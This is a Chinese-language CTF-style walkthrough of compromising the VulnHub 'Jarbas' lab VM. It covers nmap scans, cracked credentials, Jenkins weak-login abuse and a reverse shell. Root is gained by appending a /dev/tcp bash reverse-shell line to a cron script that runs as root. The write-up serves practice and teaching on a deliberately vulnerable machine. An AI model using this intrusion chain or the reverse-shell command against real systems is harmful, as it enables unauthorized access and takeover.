[Vulhub靶机]JARBAS靶机渗透
靶机搭建
下载地址:
https://download.vulnhub.com/jarbas/Jarbas.zip
下载后设置nat模式即可与攻击机同一网段
kali:192.168.88.133
1.信息收集
主机发现
首先对C段进行扫描,发现131这台主机
sudo nmap -sn 192.168.88.0/24
端口扫描
接下来对这台主机的端口进行4次扫描,第一次快速的tcp扫描,第二次常见端口的udp扫描,第三次详细的tcp扫描(针对已经探测出来的端口),第四次启用nmap自带的漏扫进行扫描(也是探测出来的端口)
TCP快速扫描
sudo nmap -sT --min-rate=10000 -p- 192.168.88.131 -oA vulhub/JarBas/nmapports1-p- 扫描全端口
--min-rate=10000 设置最小的扫描速率
UDP扫描
sudo nmap -sU --top-port 20 192.168.88.131 -oA vulhub/JarBas/udp-ports1--top-port 常见20个端口
接下来把TCP端口的信息整合在变量上,下两次扫描命令更好写
TCP详细扫描探测出的端口信息
sudo nmap -sT -sV -sC -O -p21,22,80,3306,8080 192.168.88.131 -oA vulhub/JarBas/details1
使用漏洞脚本扫描
sudo nmap --script=vuln -p21,22,80,3306,8080 192.168.88.131 -oA vulhub/JarBas/vuln1
2.漏洞探测发现
Mysql渗透
查看了一下未授权,无果就直接放弃了
sudo mysql -h 192.168.88.131 -u root -p
Web渗透
查看后是默认的页面。
使用dirsearch扫一下目录
dirsearch -u 192.168.88.131
查看/access.html
写着凭证以安全的方式进行了加密,尝试使用hash-identifier识别一下这个密文
识别大概率是md5
成功解密,对应密文如下 第一反应是ssh登录,mysql登录,但是都没有成功
tiago:italia99
trindade:marianna
eder:vipsu
接着访问到了8080端口,为一套很常见的cms-Jenkins。那先尝试一下nmap扫的robots.txt以及刚刚找到的这三个用户和弱口令尝试
发现第三个用户eder成功登录
那随机去搜索一下Jenkins的漏洞
创建项目,然后执行shell命令,写入反弹shell,kali开启监听。
点击Build_Now 执行刚刚创建的项目,成功反弹。但是权限很低。很多命令无法执行
jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false
查看定时任务
cat /etc/crontab
发现每五分钟会以root权限执行如下脚本
查看到有写入的权限,将反弹shell写入sh脚本中 kali开启监听
echo "/bin/bash -i >& /dev/tcp/192.168.88.133/4443 0>&1" >> /etc/script/CleaningScript.sh
nc -lvvp 4443
成功拿到root权限